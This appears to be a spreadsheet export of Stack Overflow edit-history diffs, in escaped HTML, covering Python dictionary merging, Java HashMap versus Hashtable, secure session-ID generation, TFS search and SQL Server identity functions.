&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;y = {&lt;span class="hljs-string"&gt;'b'&lt;/span&gt;:&lt;span class="hljs-number"&gt;10&lt;/span&gt;, &lt;span class="hljs-string"&gt;'c'&lt;/span&gt;: &lt;span class="hljs-number"&gt;11&lt;/span&gt;}_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x.items() + y.items())_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z_x000D_
{&lt;span class="hljs-string"&gt;'a'&lt;/span&gt;: &lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-string"&gt;'c'&lt;/span&gt;: &lt;span class="hljs-number"&gt;11&lt;/span&gt;, &lt;span class="hljs-string"&gt;'b'&lt;/span&gt;: &lt;span class="hljs-number"&gt;10&lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you use Python 3, it is only a &lt;span class="diff-delete"&gt;different operator&lt;/span&gt;. To create &lt;code&gt;z&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x.items() &lt;span class="diff-delete"&gt;|&lt;/span&gt; y.items())_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z_x000D_
{&lt;span class="hljs-string"&gt;'a'&lt;/span&gt;: &lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-string"&gt;'c'&lt;/span&gt;: &lt;span class="hljs-number"&gt;11&lt;/span&gt;, &lt;span class="hljs-string"&gt;'b'&lt;/span&gt;: &lt;span class="hljs-number"&gt;10&lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In your case, what you can do is:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x.items() + y.items())_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This will, as you want it, put the final dict in &lt;code&gt;z&lt;/code&gt;, and make the value for key &lt;code&gt;b&lt;/code&gt; be properly overridden by the second (&lt;code&gt;y&lt;/code&gt;) dict's value:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;x = {&lt;span class="hljs-string"&gt;'a'&lt;/span&gt;:&lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-string"&gt;'b'&lt;/span&gt;: &lt;span class="hljs-number"&gt;2&lt;/span&gt;}_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;y = {&lt;span class="hljs-string"&gt;'b'&lt;/span&gt;:&lt;span class="hljs-number"&gt;10&lt;/span&gt;, &lt;span class="hljs-string"&gt;'c'&lt;/span&gt;: &lt;span class="hljs-number"&gt;11&lt;/span&gt;}_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x.items() + y.items())_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z_x000D_
{&lt;span class="hljs-string"&gt;'a'&lt;/span&gt;: &lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-string"&gt;'c'&lt;/span&gt;: &lt;span class="hljs-number"&gt;11&lt;/span&gt;, &lt;span class="hljs-string"&gt;'b'&lt;/span&gt;: &lt;span class="hljs-number"&gt;10&lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you use Python 3, it is only a &lt;span class="diff-add"&gt;little more complicated&lt;/span&gt;. To create &lt;code&gt;z&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;&lt;span class="diff-add"&gt;(&lt;span class="hljs-built_in"&gt;list&lt;/span&gt;&lt;/span&gt;(x.items(&lt;span class="diff-add"&gt;)&lt;/span&gt;) &lt;span class="diff-add"&gt;+&lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-built_in"&gt;list&lt;/span&gt;(&lt;/span&gt;y.items(&lt;span class="diff-add"&gt;)&lt;/span&gt;))_x000D_
&lt;span class="hljs-meta"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;z_x000D_
{&lt;span class="hljs-string"&gt;'a'&lt;/span&gt;: &lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-string"&gt;'c'&lt;/span&gt;: &lt;span class="hljs-number"&gt;11&lt;/span&gt;, &lt;span class="hljs-string"&gt;'b'&lt;/span&gt;: &lt;span class="hljs-number"&gt;10&lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>wim</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Till&lt;/span&gt;, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you &lt;strong&gt;should&lt;/strong&gt; consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Do not reinvent the wheel. Use a framework.&lt;/strong&gt; Any of them is better than none. The initial time investment in learning it pays back almost instantly.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;pek&lt;/span&gt;, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you &lt;strong&gt;should&lt;/strong&gt; consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Do not reinvent the wheel. Use a framework.&lt;/strong&gt; Any of them is better than none. The initial time investment in learning it pays back almost instantly.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Micha? Nied?wiedzki</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; @Matthew: works, but doesn't meet the "single expression" criterion.&lt;/p&gt; _x000D_
 &lt;p&gt; Another, even more concise, option I discovered:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x, **y)_x000D_
&lt;span class="diff-delete"&gt;_z__x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Anyone have any knowledge about performance implications of this vs the .items() solution?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; @Matthew: works, but doesn't meet the "single expression" criterion.&lt;/p&gt; _x000D_
 &lt;p&gt; Another, even more concise, option I discovered:&lt;/p&gt; _x000D_
 &lt;pre class="lang-py s-code-block hljs python"&gt;&lt;code&gt;z = &lt;span class="hljs-built_in"&gt;dict&lt;/span&gt;(x, **y)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Anyone have any knowledge about performance implications of this vs the .items() solution?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Carl Meyer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the difference between a &lt;strong&gt;&lt;span class="diff-delete"&gt;HashMap&lt;/span&gt;&lt;/strong&gt; and a &lt;strong&gt;&lt;span class="diff-delete"&gt;Hashtable&lt;/span&gt;&lt;/strong&gt; in Java?&lt;/p&gt; _x000D_
 &lt;p&gt; Which is more &lt;em&gt;efficient&lt;/em&gt; for &lt;em&gt;non-threaded&lt;/em&gt; applications?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the difference between a &lt;code&gt;&lt;span class="diff-add"&gt;HashMap&lt;/span&gt;&lt;/code&gt; and a &lt;code&gt;&lt;span class="diff-add"&gt;Hashtable&lt;/span&gt;&lt;/code&gt; in Java?&lt;/p&gt; _x000D_
 &lt;p&gt; Which is more &lt;em&gt;efficient&lt;/em&gt; for &lt;em&gt;non-threaded&lt;/em&gt; applications?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Harbinger</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I always thought Java was pass by reference, however I've seen a couple of blog posts (e.g. &lt;a href="http://javadude.com/articles/passbyvalue.htm" rel="nofollow noreferrer"&gt;this blog&lt;/a&gt;) that claim it's not. I don't think I understand the distinction they're making. Could someone explain it please?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; thanks&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I always thought Java was pass by reference, however I've seen a couple of blog posts (e.g. &lt;a href="http://javadude.com/articles/passbyvalue.htm" rel="nofollow noreferrer"&gt;this blog&lt;/a&gt;) that claim it's not. I don't think I understand the distinction they're making. Could someone explain it please?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Marshall</t>
  </si>
  <si>
    <t>Pratik</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;HashMap&lt;/code&gt;: An implementation of the &lt;code&gt;Map&lt;/code&gt; interface that uses hash codes to index an array. &lt;code&gt;Hashtable&lt;/code&gt;: Hi, 1998 called. They want their collections API back.&lt;/p&gt; _x000D_
 &lt;p&gt; Seriously though, you're better off staying away from &lt;code&gt;Hashtable&lt;/code&gt; altogether. For single-threaded apps, you don't need the extra overhead of &lt;span class="diff-delete"&gt;synchronization&lt;/span&gt;. For highly concurrent apps, the paranoid &lt;span class="diff-delete"&gt;synchronization&lt;/span&gt; might lead to starvation, deadlocks, or unnecessary garbage collection pauses. Like Tim Howland pointed out, you might use &lt;code&gt;ConcurrentHashMap&lt;/code&gt; instead.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;HashMap&lt;/code&gt;: An implementation of the &lt;code&gt;Map&lt;/code&gt; interface that uses hash codes to index an array. &lt;code&gt;Hashtable&lt;/code&gt;: Hi, 1998 called. They want their collections API back.&lt;/p&gt; _x000D_
 &lt;p&gt; Seriously though, you're better off staying away from &lt;code&gt;Hashtable&lt;/code&gt; altogether. For single-threaded apps, you don't need the extra overhead of &lt;span class="diff-add"&gt;syncrhonisation&lt;/span&gt;. For highly concurrent apps, the paranoid &lt;span class="diff-add"&gt;synchronisation&lt;/span&gt; might lead to starvation, deadlocks, or unnecessary garbage collection pauses. Like Tim Howland pointed out, you might use &lt;code&gt;ConcurrentHashMap&lt;/code&gt; instead.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Apocalisp</t>
  </si>
  <si>
    <t>Community</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a way to search the latest version of every file in TFS for a specific string or regex? This is probably the only thing I miss from Visual Source Safe...&lt;/p&gt; _x000D_
 &lt;p&gt; Currently I perform a Get Latest on the entire codebase and use Windows Search, but this gets quite painful with over 1GB of code in 75,000 files.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Tried the powertools mentioned, but the "Wildcard Search" option appears to only search filenames and not contents.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a way to search the latest version of every file in TFS for a specific string or regex? This is probably the only thing I miss from Visual Source Safe...&lt;/p&gt; _x000D_
 &lt;p&gt; Currently I perform a Get Latest on the entire codebase and use Windows Search, but this gets quite painful with over 1GB of code in 75,000 files.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Tried the powertools mentioned, but the "Wildcard Search" option appears to only search filenames and not contents.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;UPDATE&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt;: We have implemented a customised search option in an existing MOSS (Search Server) installation. Thanks for the help guys.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mark Glorie</t>
  </si>
  <si>
    <t>user3850</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here is code for secure, easy, but a little bit more expensive session identifiers.&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; java.security.SecureRandom;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;SessionIdentifierGenerator&lt;/span&gt; &lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; SecureRandom random = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; SecureRandom();_x000D_
_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; String &lt;span class="hljs-title"&gt;nextSessionId&lt;/span&gt;&lt;span class="hljs-params"&gt;()&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; BigInteger(&lt;span class="hljs-number"&gt;130&lt;/span&gt;, random).toString(&lt;span class="hljs-number"&gt;32&lt;/span&gt;);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This works by choosing 130 bits from a cryptographically secure random bit generator, and encoding them in base-32. 128 bits is considered to be cryptographically &lt;em&gt;strong,&lt;/em&gt; but each digit in a base 32 number can encode 5 bits, so 128 is rounded up to the next multiple of 5. This encoding is compact and efficient, with 5 random bits per character. Compare this to a random UUID, which only has 3.4 bits per character in standard layout, and only 122 random bits in total.&lt;/p&gt; _x000D_
 &lt;p&gt; If you allow session identifiers to be easily guessable (too short, flawed random number generator, etc.), attackers can hijack other's sessions. Note that &lt;code&gt;SecureRandom&lt;/code&gt; objects are expensive to initialize, so you'll want to keep one around and reuse it.&lt;/p&gt; _x000D_
 &lt;p&gt; Here is alternative code for cheap, insecure random alpha-numeric strings. You can tweak the "symbols" if you want to use more characters.&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;RandomString&lt;/span&gt; &lt;/span&gt;{_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt;[] SYMBOLS;_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; {_x000D_
    StringBuilder tmp = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringBuilder();_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;char&lt;/span&gt; ch = &lt;span class="hljs-string"&gt;'0'&lt;/span&gt;; ch &amp;lt;= &lt;span class="hljs-string"&gt;'9'&lt;/span&gt;; ++ch)_x000D_
      tmp.append(ch);_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;char&lt;/span&gt; ch = &lt;span class="hljs-string"&gt;'a'&lt;/span&gt;; ch &amp;lt;= &lt;span class="hljs-string"&gt;'z'&lt;/span&gt;; ++ch)_x000D_
      tmp.append(ch);_x000D_
    SYMBOLS = tmp.toString().toCharArray();_x000D_
  }   _x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; length;_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; &lt;/span&gt;Random random = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Random();_x000D_
   _x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-title"&gt;RandomString&lt;/span&gt;&lt;span class="hljs-params"&gt;(&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; length)&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (length &amp;lt; &lt;span class="hljs-number"&gt;1&lt;/span&gt;)_x000D_
      &lt;span class="hljs-keyword"&gt;throw&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; IllegalArgumentException(&lt;span class="hljs-string"&gt;"length &amp;lt; 1: "&lt;/span&gt; + length);_x000D_
    &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.length&lt;/span&gt; = &lt;span class="diff-delete"&gt;length&lt;/span&gt;_x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; String &lt;span class="hljs-title"&gt;nextString&lt;/span&gt;&lt;span class="hljs-params"&gt;()&lt;/span&gt; &lt;/span&gt;{&lt;span class="diff-delete"&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;char&lt;/span&gt;[] buf = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt;[length];&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; idx = &lt;span class="hljs-number"&gt;0&lt;/span&gt;; idx &amp;lt; buf.length; ++idx) _x000D_
      buf[idx] = SYMBOLS[random.nextInt(SYMBOLS.length)];_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; String(buf);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here is code for secure, easy, but a little bit more expensive session identifiers.&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; java.security.SecureRandom;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;SessionIdentifierGenerator&lt;/span&gt; &lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; SecureRandom random = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; SecureRandom();_x000D_
_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; String &lt;span class="hljs-title"&gt;nextSessionId&lt;/span&gt;&lt;span class="hljs-params"&gt;()&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; BigInteger(&lt;span class="hljs-number"&gt;130&lt;/span&gt;, random).toString(&lt;span class="hljs-number"&gt;32&lt;/span&gt;);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This works by choosing 130 bits from a cryptographically secure random bit generator, and encoding them in base-32. 128 bits is considered to be cryptographically &lt;em&gt;strong,&lt;/em&gt; but each digit in a base 32 number can encode 5 bits, so 128 is rounded up to the next multiple of 5. This encoding is compact and efficient, with 5 random bits per character. Compare this to a random UUID, which only has 3.4 bits per character in standard layout, and only 122 random bits in total.&lt;/p&gt; _x000D_
 &lt;p&gt; If you allow session identifiers to be easily guessable (too short, flawed random number generator, etc.), attackers can hijack other's sessions. Note that &lt;code&gt;SecureRandom&lt;/code&gt; objects are expensive to initialize, so you'll want to keep one around and reuse it.&lt;/p&gt; _x000D_
 &lt;p&gt; Here is alternative code for cheap, insecure random alpha-numeric strings. You can tweak the "symbols" if you want to use more characters.&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;RandomString&lt;/span&gt; &lt;/span&gt;{_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt;[] SYMBOLS;_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; {_x000D_
    StringBuilder tmp = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringBuilder();_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;char&lt;/span&gt; ch = &lt;span class="hljs-string"&gt;'0'&lt;/span&gt;; ch &amp;lt;= &lt;span class="hljs-string"&gt;'9'&lt;/span&gt;; ++ch)_x000D_
      tmp.append(ch);_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;char&lt;/span&gt; ch = &lt;span class="hljs-string"&gt;'a'&lt;/span&gt;; ch &amp;lt;= &lt;span class="hljs-string"&gt;'z'&lt;/span&gt;; ++ch)_x000D_
      tmp.append(ch);_x000D_
    SYMBOLS = tmp.toString().toCharArray();_x000D_
  }   _x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt; Random random = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; Random();&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-keyword"&gt;final&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;char&lt;/span&gt;[]&lt;/span&gt; &lt;span class="diff-add"&gt;buf;_x000D_
&lt;/span&gt;_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-title"&gt;RandomString&lt;/span&gt;&lt;span class="hljs-params"&gt;(&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; length)&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (length &amp;lt; &lt;span class="hljs-number"&gt;1&lt;/span&gt;)_x000D_
      &lt;span class="hljs-keyword"&gt;throw&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; IllegalArgumentException(&lt;span class="hljs-string"&gt;"length &amp;lt; 1: "&lt;/span&gt; + length);_x000D_
    &lt;span class="diff-add"&gt;buf&lt;/span&gt; = &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;new&lt;/span&gt; &lt;span class="hljs-keyword"&gt;char&lt;/span&gt;[length];&lt;/span&gt;_x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; String &lt;span class="hljs-title"&gt;nextString&lt;/span&gt;&lt;span class="hljs-params"&gt;()&lt;/span&gt; &lt;/span&gt;{_x000D_
    &lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; idx = &lt;span class="hljs-number"&gt;0&lt;/span&gt;; idx &amp;lt; buf.length; ++idx) _x000D_
      buf[idx] = SYMBOLS[random.nextInt(SYMBOLS.length)];_x000D_
    &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; String(buf);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rafael Winterhalter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The commonly available system properties are documented in the &lt;a href="http://java.sun.com/javase/6/docs/api/java/lang/System.html#getProperties%28%29" rel="nofollow noreferrer"&gt;&lt;code&gt;System.getProperties()&lt;/code&gt;&lt;/a&gt; method&lt;span class="diff-delete"&gt; for Java 6&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; As Chris said &lt;code&gt;"user.name"&lt;/code&gt; is the property to get the user running your app.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The commonly available system properties are documented in the &lt;a href="http://java.sun.com/javase/6/docs/api/java/lang/System.html#getProperties%28%29" rel="nofollow noreferrer"&gt;&lt;code&gt;System.getProperties()&lt;/code&gt;&lt;/a&gt; method.&lt;/p&gt; _x000D_
 &lt;p&gt; As Chris said &lt;code&gt;"user.name"&lt;/code&gt; is the property to get the user running your app.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>marklark</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;@@IDENTITY&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt;is&lt;/span&gt; the last identity inserted using the current SQL Connection. This is a good value to return from an insert stored procedure, where you just need the identity inserted for your new record, and don't care if more rows were added afterward.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;SCOPE_IDENTITY&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt;Is&lt;/span&gt; the last identity inserted using the current SQL Connection, and in the current scope -- that is, if there was a second &lt;code&gt;&lt;span class="diff-delete"&gt;IDENTITY&lt;/span&gt;&lt;/code&gt; inserted based on a trigger after your insert, it would not be reflected in &lt;code&gt;&lt;span class="diff-delete"&gt;SCOPE_IDENTITY&lt;/span&gt;&lt;/code&gt;, only the insert you performed. Frankly, I have never had a reason to use this.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;IDENT_CURRENT(tablename)&lt;/span&gt;&lt;/code&gt;&lt;br&gt;&lt;span class="diff-delete"&gt;Is&lt;/span&gt; the last identity inserted regardless of connection or scope. You could use this if you want to get the current &lt;code&gt;&lt;span class="diff-delete"&gt;IDENTITY&lt;/span&gt;&lt;/code&gt; value for a table that you have not inserted a record into.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
